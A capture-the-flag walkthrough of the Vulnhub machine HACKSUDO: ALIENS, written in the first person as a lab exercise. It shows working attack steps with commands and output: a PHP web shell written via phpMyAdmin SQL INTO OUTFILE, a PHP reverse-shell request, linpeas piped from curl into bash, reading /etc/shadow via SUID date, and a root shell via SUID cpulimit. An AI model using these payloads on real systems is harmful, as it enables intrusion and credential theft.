This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh)

This is HACKSUDO: ALIENS from Vulnhub. I also did COLDDWORLD: IMMERSION which was LFI to SSH login to editing a python script. I don’t have anymore to say about that.


SSH, plus HTTP on ports 80 and 9000.


This has got phpMyAdmin, which isn’t working with any kind of default creds. I enumerate the webserver and find some stuff, but nothing too interesting.


This has stuff about aliens. Let’s look around:

└─# python3 /opt/dirsearch/dirsearch.py -u     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10848
Error Log: /opt/dirsearch/logs/errors-21-04-09_07-30-48.log
Output File: /opt/dirsearch/reports/

# snip
[07:30:51] 200 -   16B  - /README.md                                              
[07:30:55] 301 -  315B  - /backup  ->
[07:30:55] 200 -  941B  - /backup/        
# snip

What’s in backup? mysql.bak. What’s in that?

Database credentials


With this, we can login to phpMyAdmin.


After I’ve looked around, grabbed some hashes and had a go at cracking them, then tried password reuse on SSH with no success, I use a SQL statement to create a PHP file on the server:

SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/cmd1.php'

This works and I use it to get a shell:

GET /cmd1.php?cmd=php+-r+'$sock%3dfsockopen("",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1


I run linpeas:

www-data@hacksudo:/dev/shm$ curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | bash

Which shows that date has the SUID bit; GTFOBins gives a file read:

sudo date -f $LFILE

I use this to read the shadow file, and then send the hash for hacksudo to john, where it cracks. Now, we can SSH in as hacksudo.


└─# ssh hacksudo@                                                                                                                                                        1 ⨯
hacksudo@'s password: 
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr  4 02:12:24 2021 from
hacksudo@hacksudo:~$ pwd

I run linpeas again, and we have cpulimit with the SUID bit in our home directory. Again, it’s GTFOBins:

hacksudo@hacksudo:~/Downloads$ ./cpulimit -l 100 -f -- /bin/sh -p
Process 31419 detected
# id;hostname
uid=1000(hacksudo) gid=1000(hacksudo) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(hacksudo)
# cd /root
# ls -lash 
total 40K
4.0K drwx------  4 root root 4.0K Apr  4 01:35 .
4.0K drwxr-xr-x 19 root root 4.0K Apr  3 09:56 ..
4.0K -rw-------  1 root root 1.7K Apr  3 13:43 .bash_history
4.0K -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
4.0K drwx------  2 root root 4.0K Mar 28 08:18 .cache
4.0K drwxr-xr-x  3 root root 4.0K Apr  3 09:22 .local
4.0K -rw-------  1 root root 1.1K Apr  3 10:18 .mysql_history
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -r--------  1 root root  552 Apr  4 01:35 root.txt
4.0K -rw-r--r--  1 root root  227 Apr  3 13:22 .wget-hsts
# cat root.txt
# snip ascii art

congratulations you rooted hacksudo alien56...!!!

So fairly easy, but I don’t think I’ve done the SQL to outfile in phpMyAdmin before.